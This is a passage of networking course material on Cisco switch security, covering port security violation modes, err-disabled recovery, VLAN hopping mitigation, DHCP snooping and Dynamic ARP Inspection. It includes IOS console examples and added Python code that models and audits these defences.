Protect         Yes                         No                    No                          No
Restrict        Yes                         Yes                   Yes                         No
Shutdown        Yes                         Yes                   Yes                         Yes

The following example shows an administrator changing the security violation to “restrict”. The output of
the show port-security interface command confirms that the change has been made.

S1(config)# interface f0/1
S1(config-if)# switchport port-security violation restrict
S1(config-if)# end
S1#
S1# show port-security interface f0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Restrict
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1#
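The rules in 11.1.2 through 11.1.6 (maximum addresses, static and sticky learning, inactivity aging, and the protect/restrict/shutdown modes from the comparison table) modelled in Python, as an added example that is not course material. The SecurePort class, the static MAC 0200.0000.1234 and the minute timestamps are constructed; the two host MAC addresses and the syslog wording are taken from the console output in this section.

```python
# Added example (not from the course): a model of one port-security
# protected access port that follows the maximum, learning, aging and
# violation-mode rules of 11.1.2 - 11.1.6.  The static MAC and the
# timestamps (whole minutes) are constructed sample values.
from dataclasses import dataclass, field


@dataclass
class SecurePort:
    name: str
    maximum: int = 1                 # switchport port-security maximum <n>
    violation: str = "shutdown"      # protect | restrict | shutdown
    aging_time: int = 0              # minutes; 0 disables aging
    aging_type: str = "absolute"     # absolute | inactivity
    sticky: bool = False             # switchport port-security mac-address sticky
    link_up: bool = True
    secure: dict = field(default_factory=dict)   # mac -> [type, timestamp]
    violations: int = 0
    errdisabled: bool = False
    syslog: list = field(default_factory=list)

    def add_static(self, mac):
        """switchport port-security mac-address <mac>.  Static entries do not
        age unless 'aging static' is configured (not modelled here)."""
        self.secure[mac] = ["SecureConfigured", None]

    def _age_out(self, now):
        if self.aging_time == 0:
            return
        for mac, (kind, stamp) in list(self.secure.items()):
            if kind != "SecureConfigured" and now - stamp >= self.aging_time:
                del self.secure[mac]

    def receive(self, src_mac, now=0):
        """Process one ingress frame at minute 'now'; return 'forward' or 'drop'."""
        if self.errdisabled:
            return "drop"
        self._age_out(now)
        entry = self.secure.get(src_mac)
        if entry is not None:
            # inactivity aging restarts the timer on traffic; absolute keeps the learn time
            if self.aging_type == "inactivity" and entry[0] != "SecureConfigured":
                entry[1] = now
            return "forward"
        if len(self.secure) < self.maximum:
            kind = "SecureSticky" if self.sticky else "SecureDynamic"
            self.secure[src_mac] = [kind, now]
            return "forward"
        return self._violate(src_mac)

    def _violate(self, mac):
        if self.violation == "protect":
            return "drop"                      # silent: no counter, no syslog
        self.violations += 1
        self.syslog.append(f"%PORT_SECURITY-2-PSECURE_VIOLATION: Security violation "
                           f"occurred, caused by MAC address {mac} on port {self.name}.")
        if self.violation == "shutdown":
            self.errdisabled = True
            self.syslog.append(f"%PM-4-ERR_DISABLE: psecure-violation error detected on "
                               f"{self.name}, putting {self.name} in err-disable state")
        return "drop"

    def recover(self):
        """Administrator issues shutdown / no shutdown after investigating."""
        self.errdisabled = False

    def status(self):
        """Subset of the 'show port-security interface' fields."""
        if self.errdisabled:
            state = "Secure-shutdown"
        else:
            state = "Secure-up" if self.link_up else "Secure-down"
        return {"Port Status": state,
                "Violation Mode": self.violation.capitalize(),
                "Maximum MAC Addresses": self.maximum,
                "Total MAC Addresses": len(self.secure),
                "Security Violation Count": self.violations}


def demo(mode):
    """Fa0/1 as configured in 11.1.4 (maximum 2, one static, sticky learning),
    then an unexpected third host appears on the port."""
    port = SecurePort("Fa0/1", maximum=2, violation=mode, sticky=True)
    port.add_static("0200.0000.1234")            # constructed static MAC
    results = [port.receive("a41f.7272.676a"),    # first host, learned as sticky
               port.receive("a41f.7273.018c"),    # unexpected host: violation
               port.receive("a41f.7272.676a")]    # first host again
    return results, port.status()


if __name__ == "__main__":
    for mode in ("protect", "restrict", "shutdown"):
        print(mode, demo(mode))
```

Running demo for each mode reproduces the comparison table: protect drops the unexpected frame and nothing else happens, restrict drops it, counts it and logs it while the legitimate host keeps working, and shutdown also err-disables the port so that even the legitimate host is cut off until an administrator runs shutdown and no shutdown.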

11.1.7 Ports in error-disabled State

What happens when the port security violation mode is shutdown and a port violation occurs? The port is physically
shut down and placed in the error-disabled state, and no traffic is sent or received on that port.

In the figure, the port security violation is changed back to the default shutdown setting. Then the host with
MAC address a41f.7272.676a is disconnected and a new host is plugged into Fa0/1.

Notice how a series of port security related messages are generated on the console.

S1(config)# int fa0/1
S1(config-if)# switchport port-security violation shutdown
S1(config-if)# end
S1#
*Mar 1 [Link].599: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to down
*Mar 1 [Link].606: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
down
*Mar 1 [Link].114: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].121: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1#
*Mar 1 [Link].829: %PM-4-ERR_DISABLE: psecure-violation error detected on
Fa0/1, putting Fa0/1 in err-disable state
*Mar 1 [Link].838: %PORT_SECURITY-2-PSECURE_VIOLATION: Security violation
occurred, caused by MAC address a41f.7273.018c on port FastEthernet0/1.
*Mar 1 [Link].836: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to down
*Mar 1 [Link].843: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
down
S1#

Note: The port protocol and link status are changed to down and the port LED is turned off.

In the example, the show interface command identifies the port status as err-disabled. The output of
the show port-security interface command now shows the port status as Secure-shutdown instead of
Secure-up. The Security Violation counter increments by 1.

S1# show interface fa0/1 | include down
FastEthernet0/1 is down, line protocol is down (err-disabled)
(output omitted)
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-shutdown
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7273.018c:1
Security Violation Count : 1
S1#

The administrator should determine what caused the security violation. If an unauthorized device is connected
to a secure port, the security threat is eliminated before re-enabling the port.

In the next example, the first host is reconnected to Fa0/1. To re-enable the port, first use
the shutdown command, then, use the no shutdown command to make the port operational, as shown in the
example.

S1(config)# interface fa0/1
S1(config-if)# shutdown
S1(config-if)#
*Mar 1 [Link].981: %LINK-5-CHANGED: Interface FastEthernet0/1, changed state
to administratively down
S1(config-if)# no shutdown
S1(config-if)#
*Mar 1 [Link].275: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].282: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1(config-if)#

11.1.8 Verify Port Security

After configuring port security on a switch, check each interface to verify that the port security is set correctly,
and check to ensure that the static MAC addresses have been configured correctly.

Port Security for All Interfaces

To display port security settings for the switch, use the show port-security command. The example indicates
that only one port is configured with the switchport port-security command.

S1# show port-security
Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action
(Count) (Count) (Count)
---------------------------------------------------------------------------
Fa0/1 2 2 0 Shutdown
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#

Port Security for a Specific Interface

Use the show port-security interface command to view details for a specific interface, as shown previously
and in this example.

S1# show port-security interface fastethernet 0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7273.018c:1
Security Violation Count : 0
S1#

Verify Learned MAC Addresses

To verify that MAC addresses are “sticking” to the configuration, use the show run command as shown in the
example for FastEthernet 0/1.

S1# show run interface fa0/1
Building configuration...

Current configuration : 365 bytes
!
interface FastEthernet0/1
switchport mode access
switchport port-security maximum 2
switchport port-security mac-address sticky
switchport port-security mac-address sticky a41f.7272.676a
switchport port-security mac-address [Link].1234
switchport port-security aging time 10
switchport port-security aging type inactivity
switchport port-security
end

S1#

Verify Secure MAC Addresses

To display all secure MAC addresses that are manually configured or dynamically learned on all switch
interfaces, use the show port-security address command as shown in the example.

S1# show port-security address
Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 a41f.7272.676a SecureSticky Fa0/1 -
1 [Link].1234 SecureConfigured Fa0/1 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#
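Checking every interface by eye does not scale past a handful of switches, so here is an added Python example (not course material) that parses the text of show port-security and show port-security interface into dictionaries and flags the conditions this section tells an administrator to look for. The two captures are constructed to follow the column layout shown above; the field values (the a41f.7273.018c violation on Fa0/1) are taken from the example output in 11.1.7.

```python
# Added example (not from the course): parse 'show port-security' and
# 'show port-security interface' output and flag ports needing attention.
# The captured text below is constructed to match the format in this section.
import re

SUMMARY = """\
S1# show port-security
Secure Port  MaxSecureAddr  CurrentAddr  SecurityViolation  Security Action
                (Count)       (Count)          (Count)
---------------------------------------------------------------------------
      Fa0/1              2            2                  1         Shutdown
      Fa0/5              3            3                  4         Restrict
      Fa0/7              1            1                  0          Protect
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 3
Max Addresses limit in System (excluding one mac per port) : 8192
"""

DETAIL_FA01 = """\
S1# show port-security interface fa0/1
Port Security              : Enabled
Port Status                : Secure-shutdown
Violation Mode             : Shutdown
Aging Time                 : 10 mins
Aging Type                 : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses      : 2
Total MAC Addresses        : 2
Configured MAC Addresses   : 1
Sticky MAC Addresses       : 1
Last Source Address:Vlan   : a41f.7273.018c:1
Security Violation Count   : 1
"""

# one per-port row: port, three counters, action
ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s*$")
# 'Field name : value'; the separator is the first colon surrounded by whitespace,
# so 'Last Source Address:Vlan : a41f...' keeps its full key
FIELD = re.compile(r"^(.+?)\s*:\s(.+?)\s*$")


def parse_summary(text):
    """Per-port rows of 'show port-security' -> {port: {...}}."""
    rows = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            port, mx, cur, viol, action = m.groups()
            rows[port] = {"max": int(mx), "current": int(cur),
                          "violations": int(viol), "action": action}
    return rows


def parse_interface(text):
    """'show port-security interface' -> {field: value} (values kept as text)."""
    fields = {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            fields[m.group(1).strip()] = m.group(2)
    return fields


def audit(summary, details):
    """Return (port, finding) pairs an administrator should act on."""
    findings = []
    for port, row in summary.items():
        if row["violations"]:
            findings.append((port, "violations logged; identify the offending MAC "
                                   "(Last Source Address) before clearing"))
        if row["action"].lower() == "protect":
            findings.append((port, "protect mode drops silently; use restrict or "
                                   "shutdown so violations are counted and logged"))
    for port, f in details.items():
        if f.get("Port Status") == "Secure-shutdown":
            findings.append((port, "err-disabled by a violation; investigate, "
                                   "then shutdown / no shutdown to recover"))
    return findings


if __name__ == "__main__":
    summary = parse_summary(SUMMARY)
    details = {"Fa0/1": parse_interface(DETAIL_FA01)}
    for port, finding in audit(summary, details):
        print(f"{port}: {finding}")
```

The summary command is enough to spot ports with a non-zero violation counter or a silent protect mode; the per-interface command is needed to see whether a port is currently Secure-shutdown and which source address triggered the violation.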

11.1.9 Syntax Checker - Implement Port Security

Implement port security for a switch interface based on the specified requirements.

You are currently logged into S1. Configure FastEthernet 0/5 for port security by using the following
requirements:

> Use the interface name fa0/5 to enter interface configuration mode.
> Enable the port for access mode.
> Enable port security.
> Set the maximum number of MAC address to 3.
> Statically configure the MAC address [Link].1234.
> Configure the port to dynamically learn additional MAC addresses and dynamically add them to the
running configuration.
> Return to privileged EXEC mode.

S1(config)#interface fa0/5
S1(config-if)#switchport mode access
S1(config-if)#switchport port-security
S1(config-if)#switchport port-security maximum 3
S1(config-if)#switchport port-security mac-address [Link].1234
S1(config-if)#switchport port-security mac-address sticky
S1(config-if)#end

Enter the command to verify port security for all interfaces.

S1#show port-security
Secure Port MaxSecureAddr CurrentAddr SecurityViolation Security Action
(Count) (Count) (Count)
---------------------------------------------------------------------------
Fa0/5 3 2 0 Shutdown
---------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 0
Max Addresses limit in System (excluding one mac per port) : 8192

Enter the command to verify port security on FastEthernet 0/5. Use fa0/5 for the interface name.

S1#show port-security interface fa0/5
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 3
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : 0090.2135.6B8C:1
Security Violation Count : 0

Enter the command that will display all of the addresses to verify that the manually configured and dynamically
learned MAC addresses are in the running configuration.

S1#show port-security address
Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 0090.2135.6b8c SecureSticky Fa0/5 -
1 [Link].1234 SecureConfigured Fa0/5 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 0
Max Addresses limit in System (excluding one mac per port) : 8192
You have successfully configured and verified port security for the interface.

11.1.10 Packet Tracer - Implement Port Security

In this activity, you will configure and verify port security on a switch. Port security allows you to restrict a
port’s ingress traffic by limiting the MAC addresses that are allowed to send traffic into the port.

11.2 Mitigate VLAN Attacks

11.2.1 Mitigate VLAN Attacks Review

As a quick review, a VLAN hopping attack can be launched in one of three ways:

> Spoofing DTP messages from the attacking host to cause the switch to enter trunking mode. From here,
the attacker can send traffic tagged with the target VLAN, and the switch then delivers the packets to the
destination.
> Introducing a rogue switch and enabling trunking. The attacker can then access all the VLANs on the
victim switch from the rogue switch.
> Another type of VLAN hopping attack is a double-tagging (or double-encapsulated) attack. This attack
takes advantage of the way the hardware on most switches operates.

11.2.2 Steps to Mitigate VLAN Hopping Attacks

Use the following steps to mitigate VLAN hopping attacks:

Step 1: Disable DTP (auto trunking) negotiations on non-trunking ports by using the switchport mode
access interface configuration command.

Step 2: Disable unused ports and put them in an unused VLAN.

Step 3: Manually enable the trunk link on a trunking port by using the switchport mode trunk command.

Step 4: Disable DTP (auto trunking) negotiations on trunking ports by using the switchport
nonegotiate command.

Step 5: Set the native VLAN to a VLAN other than VLAN 1 by using the switchport trunk native
vlan vlan_number command.

For example, assume the following:

> FastEthernet ports 0/1 through 0/16 are active access ports
> FastEthernet ports 0/17 through 0/20 are not currently in use
> FastEthernet ports 0/21 through 0/24 are trunk ports.

VLAN hopping can be mitigated by implementing the following configuration.

S1(config)# interface range fa0/1 - 16
S1(config-if-range)# switchport mode access
S1(config-if-range)# exit
S1(config)#
S1(config)# interface range fa0/17 - 20
S1(config-if-range)# switchport mode access
S1(config-if-range)# switchport access vlan 1000
S1(config-if-range)# shutdown
S1(config-if-range)# exit
S1(config)#
S1(config)# interface range fa0/21 - 24
S1(config-if-range)# switchport mode trunk
S1(config-if-range)# switchport nonegotiate
S1(config-if-range)# switchport trunk native vlan 999
S1(config-if-range)# end
S1#

• FastEthernet ports 0/1 to 0/16 are access ports and therefore trunking is disabled by explicitly making
them access ports.
• FastEthernet ports 0/17 to 0/20 are unused ports and are disabled and assigned to an unused VLAN.
• FastEthernet ports 0/21 to 0/24 are trunk links and are manually enabled as trunks with DTP disabled.
The native VLAN is also changed from the default VLAN 1 to an unused VLAN 999.
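To check an existing switch against the five steps above, the following Python script (an added example, not part of the course material) parses a constructed running-config excerpt and reports which mitigation step each switchport is missing; the interface names, VLAN numbers and the config text are all made up for the example.

```python
"""Added example, not from the course text: audit an IOS running-config
against the five VLAN hopping mitigation steps. The config excerpt below is
constructed; interface names and VLAN numbers are made up."""
from __future__ import annotations

import re

SAMPLE_RUNNING_CONFIG = """\
!
interface FastEthernet0/1
 switchport mode access
!
interface FastEthernet0/2
 description left at factory default, so DTP dynamic auto
!
interface FastEthernet0/17
 switchport mode access
 switchport access vlan 1000
 shutdown
!
interface FastEthernet0/18
 shutdown
!
interface FastEthernet0/21
 switchport mode trunk
 switchport nonegotiate
 switchport trunk native vlan 999
!
interface FastEthernet0/22
 switchport mode trunk
!
interface Vlan1
 ip address 192.0.2.10 255.255.255.0
!
"""


def parse_interfaces(running_config: str) -> dict[str, list[str]]:
    """Return {interface name: [commands in that stanza]} from show running-config text."""
    interfaces: dict[str, list[str]] = {}
    current = None
    for line in running_config.splitlines():
        if line.strip() in ("", "!"):
            current = None  # a bare '!' terminates the interface stanza
            continue
        m = re.match(r"^interface (\S+)$", line)
        if m:
            current = m.group(1)
            interfaces[current] = []
        elif current is not None and line.startswith(" "):
            interfaces[current].append(line.strip())
    return interfaces


def _last_word(cmds: list[str], prefix: str, default: str | None) -> str | None:
    """Last word of the first command starting with prefix, e.g. '999' from 'switchport trunk native vlan 999'."""
    return next((c.split()[-1] for c in cmds if c.startswith(prefix)), default)


def audit_vlan_hopping(running_config: str) -> dict[str, list[str]]:
    """Return {interface: [findings]} for every switchport that misses a mitigation step."""
    findings: dict[str, list[str]] = {}
    for name, cmds in parse_interfaces(running_config).items():
        if not name.lower().startswith(("fa", "gi")):
            continue  # SVIs and loopbacks are not switchports
        issues: list[str] = []
        mode = _last_word(cmds, "switchport mode ", None)
        if mode == "trunk":
            if "switchport nonegotiate" not in cmds:
                issues.append("step 4: trunk port still negotiates DTP (missing 'switchport nonegotiate')")
            if _last_word(cmds, "switchport trunk native vlan ", "1") == "1":
                issues.append("step 5: native VLAN is still VLAN 1")
        elif mode == "access":
            if "shutdown" in cmds and _last_word(cmds, "switchport access vlan ", "1") == "1":
                issues.append("step 2: unused port is shut down but left in VLAN 1")
        else:
            issues.append("step 1/3: no explicit switchport mode, so DTP dynamic auto can negotiate a trunk")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for port, issues in audit_vlan_hopping(SAMPLE_RUNNING_CONFIG).items():
        print(port, *issues, sep="\n  ")
```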

11.2.3 Syntax Checker - Mitigate VLAN Hopping Attacks

Mitigate VLAN hopping attacks on the switch based on the specified requirements.

You are currently logged into S1. The status of the ports is as follows:

> FastEthernet ports 0/1 through 0/4 are used for trunking with other switches.
> FastEthernet ports 0/5 through 0/10 are unused.
> FastEthernet ports 0/11 through 0/24 are active ports currently in use.

Use range fa0/1 - 4 to enter interface configuration mode for the trunks.

S1(config)#interface range fa0/1 - 4

Configure the interfaces as nonnegotiating trunks with native VLAN 99.

S1(config-if-range)#switchport mode trunk
S1(config-if-range)#switchport nonegotiate
S1(config-if-range)#switchport trunk native vlan 99
S1(config-if-range)# exit

Use range fa0/5 - 10 to enter interface configuration mode for the unused ports.

S1(config)#interface range fa0/5 - 10
S1(config-if-range)#switchport mode access
S1(config-if-range)#switchport access vlan 86
% Access VLAN does not exist. Creating vlan 86
S1(config-if-range)#shutdown
*Mar 1 [Link].883: %LINK-5-CHANGED: Interface FastEthernet0/5, changed state to
administratively down
*Mar 1 [Link].900: %LINK-5-CHANGED: Interface FastEthernet0/6, changed state to
administratively down
*Mar 1 [Link].908: %LINK-5-CHANGED: Interface FastEthernet0/7, changed state to
administratively down
*Mar 1 [Link].917: %LINK-5-CHANGED: Interface FastEthernet0/8, changed state to
administratively down
*Mar 1 [Link].942: %LINK-5-CHANGED: Interface FastEthernet0/9, changed state to
administratively down
*Mar 1 [Link].950: %LINK-5-CHANGED: Interface FastEthernet0/10, changed state to
administratively down
*Mar 1 [Link].890: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/5, changed state to down
*Mar 1 [Link].907: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/6, changed state to down
S1(config-if-range)# exit

Use range fa0/11 - 24 to enter interface configuration mode for the active ports and then configure them to
prevent trunking.

S1(config)#interface range fa0/11 - 24
S1(config-if-range)#switchport mode access
S1(config-if-range)# end
S1#
You have successfully mitigated VLAN hopping attacks on this switch.

11.3 Mitigate DHCP Attacks

11.3.1 DHCP Attack Review

The goal of a DHCP starvation attack is to create a Denial of Service (DoS) for connecting clients. DHCP
starvation attacks require an attack tool such as Gobbler. Recall that DHCP starvation attacks can be
effectively mitigated by using port security because Gobbler uses a unique source MAC address for each
DHCP request sent.

However, mitigating DHCP spoofing attacks requires more protection. Gobbler could be configured to use the
actual interface MAC address as the source Ethernet address, but specify a different Ethernet address in the
DHCP payload. This would render port security ineffective because the source MAC address would be
legitimate.

DHCP spoofing attacks can be mitigated by using DHCP snooping on trusted ports.

11.3.2 DHCP Snooping

DHCP snooping does not rely on source MAC addresses. Instead, DHCP snooping determines whether
DHCP messages are from an administratively configured trusted or untrusted source. It then filters DHCP
messages and rate-limits DHCP traffic from untrusted sources.

Devices under your administrative control, such as switches, routers, and servers, are trusted sources. Any
device beyond the firewall or outside your network is an untrusted source. In addition, all access ports are
generally treated as untrusted sources. The figure shows an example of trusted and untrusted ports.

Notice that the rogue DHCP server would be on an untrusted port after enabling DHCP snooping. All
interfaces are treated as untrusted by default. Trusted interfaces are typically trunk links and ports directly
connected to a legitimate DHCP server. These interfaces must be explicitly configured as trusted.

A DHCP table is built that includes the source MAC address of a device on an untrusted port and the IP
address assigned by the DHCP server to that device. The MAC address and IP address are bound together.
Therefore, this table is called the DHCP snooping binding table.

11.3.3 Steps to Implement DHCP Snooping

Use the following steps to enable DHCP snooping:

Step 1. Enable DHCP snooping by using the ip dhcp snooping global configuration command.

Step 2. On trusted ports, use the ip dhcp snooping trust interface configuration command.

Step 3. Limit the number of DHCP discovery messages that can be received per second on untrusted ports by
using the ip dhcp snooping limit rate interface configuration command.

Step 4. Enable DHCP snooping by VLAN, or by a range of VLANs, by using the ip dhcp
snooping vlan global configuration command.

11.3.4 DHCP Snooping Configuration Example

The reference topology for this DHCP snooping example is shown in the figure. Notice that F0/5 is an
untrusted port because it connects to a PC. F0/1 is a trusted port because it connects to the DHCP server.

The following is an example of how to configure DHCP snooping on S1. Notice how DHCP snooping is first
enabled. Then the upstream interface to the DHCP server is explicitly trusted. Next, the range of FastEthernet
ports from F0/5 to F0/24 is untrusted by default, so a rate limit of six packets per second is set. Finally,
DHCP snooping is enabled on VLANs 5, 10, 50, 51, and 52.

S1(config)# ip dhcp snooping
S1(config)# interface f0/1
S1(config-if)# ip dhcp snooping trust
S1(config-if)# exit
S1(config)# interface range f0/5 - 24
S1(config-if-range)# ip dhcp snooping limit rate 6
S1(config-if-range)# exit
S1(config)# ip dhcp snooping vlan 5,10,50-52
S1(config)# end
S1#

Use the show ip dhcp snooping privileged EXEC command to verify DHCP snooping and show ip dhcp
snooping binding to view the clients that have received DHCP information, as shown in the example.

Note: DHCP snooping is also required by Dynamic ARP Inspection (DAI), which is the next topic.

S1# show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
5,10,50-52
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id default format: vlan-mod-port
remote-id: 0cd9.96d2.3f80 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)
----------------------- ------- ------------ ----------------
FastEthernet0/1 yes yes unlimited
Custom circuit-ids:
FastEthernet0/5 no no 6
Custom circuit-ids:
FastEthernet0/6 no no 6
Custom circuit-ids:
S1# show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
[Link] [Link] 193185 dhcp-snooping 5 FastEthernet0/5

11.3.5 Syntax Checker – Mitigate DHCP Attacks

Implement DHCP snooping for a switch based on the following topology and specified requirements.

You are currently logged into S1. Enable DHCP snooping globally for the switch.
S1(config)#ip dhcp snooping

Enter interface configuration mode for g0/1 - 2, trust the interfaces, and return to global configuration mode.

S1(config)#interface range g0/1 - 2
S1(config-if-range)#ip dhcp snooping trust
S1(config-if-range)#exit

Enter interface configuration mode for f0/1 - 24, limit the DHCP messages to no more than 10 per second, and
return to global configuration mode.

S1(config)#interface range f0/1 - 24
S1(config-if-range)#ip dhcp snooping limit rate 10
S1(config-if-range)#exit

Enable DHCP snooping for VLANs 10,20,30-49.

S1(config)#ip dhcp snooping vlan 10,20,30-49
S1(config)# exit

Enter the command to verify DHCP snooping.

S1#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
10,20,30-49
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id default format: vlan-mod-port
remote-id: 0cd9.96d2.3f80 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled

DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)
----------------------- ------- ------------ ----------------
GigabitEthernet0/1 yes yes unlimited
Custom circuit-ids:
GigabitEthernet0/2 yes yes unlimited
Custom circuit-ids:
FastEthernet0/1 no no 10
Custom circuit-ids:

Enter the command to verify the current DHCP bindings logged by DHCP snooping

S1#show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
[Link] [Link] 193185 dhcp-snooping 5 FastEthernet0/1
S1#

You have successfully configured and verified DHCP snooping for the switch.

11.4 Mitigate ARP Attacks

11.4.1 Dynamic ARP Inspection

In a typical ARP attack, a threat actor can send unsolicited ARP requests to other hosts on the subnet with the
MAC Address of the threat actor and the IP address of the default gateway. To prevent ARP spoofing and the
resulting ARP poisoning, a switch must ensure that only valid ARP Requests and Replies are relayed.

Dynamic ARP inspection (DAI) requires DHCP snooping and helps prevent ARP attacks by:

• Not relaying invalid or gratuitous ARP Requests out to other ports in the same VLAN.
• Intercepting all ARP Requests and Replies on untrusted ports.
• Verifying each intercepted packet for a valid IP-to-MAC binding.
• Dropping and logging ARP Requests coming from invalid sources to prevent ARP poisoning.
• Error-disabling the interface if the configured DAI number of ARP packets is exceeded.

11.4.2 DAI Implementation Guidelines

To mitigate the chances of ARP spoofing and ARP poisoning, follow these DAI implementation guidelines:

• Enable DHCP snooping globally.
• Enable DHCP snooping on selected VLANs.
• Enable DAI on selected VLANs.
• Configure trusted interfaces for DHCP snooping and ARP inspection.

It is generally advisable to configure all access switch ports as untrusted and to configure all uplink ports
that are connected to other switches as trusted.

The sample topology in the figure identifies trusted and untrusted ports.

11.4.3 DAI Configuration Example

In the previous topology, S1 is connecting two users on VLAN 10. DAI will be configured to mitigate against
ARP spoofing and ARP poisoning attacks.

As shown in the example, DHCP snooping is enabled because DAI requires the DHCP snooping binding
table to operate. Next, DHCP snooping and ARP inspection are enabled for the PCs on VLAN10. The uplink
port to the router is trusted, and therefore, is configured as trusted for DHCP snooping and ARP inspection.

S1(config)# ip dhcp snooping
S1(config)# ip dhcp snooping vlan 10
S1(config)# ip arp inspection vlan 10
S1(config)# interface fa0/24
S1(config-if)# ip dhcp snooping trust
S1(config-if)# ip arp inspection trust

DAI can also be configured to validate the destination MAC, the source MAC, and the IP addresses:

• Destination MAC - Checks the destination MAC address in the Ethernet header against the target MAC
address in ARP body.
• Source MAC - Checks the source MAC address in the Ethernet header against the sender MAC address in
the ARP body.
• IP address - Checks the ARP body for invalid and unexpected IP addresses including addresses [Link],
[Link], and all IP multicast addresses.

The ip arp inspection validate {[src-mac] [dst-mac] [ip]} global configuration command configures DAI to
drop ARP packets whose IP addresses are invalid, or whose MAC addresses in the body of the ARP packet do
not match the addresses in the Ethernet header. Notice in the following example that only one validate
command is kept in the configuration: entering multiple ip arp inspection validate commands overwrites the
previous command. To include more than one validation method, enter them on the same command line, as
shown and verified in the following output.

S1(config)# ip arp inspection validate ?
dst-mac Validate destination MAC address
ip Validate IP addresses
src-mac Validate source MAC address

S1(config)# ip arp inspection validate src-mac
S1(config)# ip arp inspection validate dst-mac
S1(config)# ip arp inspection validate ip
S1(config)# do show run | include validate
ip arp inspection validate ip
S1(config)# ip arp inspection validate src-mac dst-mac ip
S1(config)# do show run | include validate
ip arp inspection validate src-mac dst-mac ip
S1(config)#
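The following Python model (an added example, not from the course) ties the DHCP snooping section and the DAI section together: it builds the DHCP snooping binding table from packets seen on trusted and untrusted ports, applies the hwaddr check that the show ip dhcp snooping output above reports as enabled, and then runs the DAI binding, src-mac and ip checks on ARP packets. The port names, MAC addresses and IP addresses are constructed for the example.

```python
"""Added example, not from the course text: a small model of how DHCP snooping
builds the binding table and how DAI then uses it to decide whether an ARP
packet is relayed. All port names, MACs and IP addresses are constructed."""
from __future__ import annotations

from dataclasses import dataclass, field
from ipaddress import IPv4Address


@dataclass
class Port:
    name: str
    vlan: int
    trusted: bool = False  # ip dhcp snooping trust + ip arp inspection trust


@dataclass
class Dhcp:
    """Only the fields DHCP snooping looks at."""
    src_mac: str             # Ethernet header source MAC
    chaddr: str              # client hardware address carried in the DHCP payload
    msg_type: str            # DISCOVER, REQUEST, OFFER, ACK or NAK
    yiaddr: str = "0.0.0.0"  # address the server hands out (OFFER/ACK)


@dataclass
class Arp:
    src_mac: str     # Ethernet header source MAC
    sender_mac: str  # ARP body sender hardware address
    sender_ip: str
    target_ip: str
    is_reply: bool = False


@dataclass
class Switch:
    ports: dict[str, Port]
    # DHCP snooping binding table: (vlan, client MAC) -> assigned IP
    bindings: dict[tuple[int, str], str] = field(default_factory=dict)

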